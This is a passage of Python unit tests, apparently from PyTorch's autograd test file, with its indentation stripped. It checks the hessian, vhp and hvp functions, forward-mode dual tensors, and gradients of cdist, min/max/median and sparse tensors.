self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
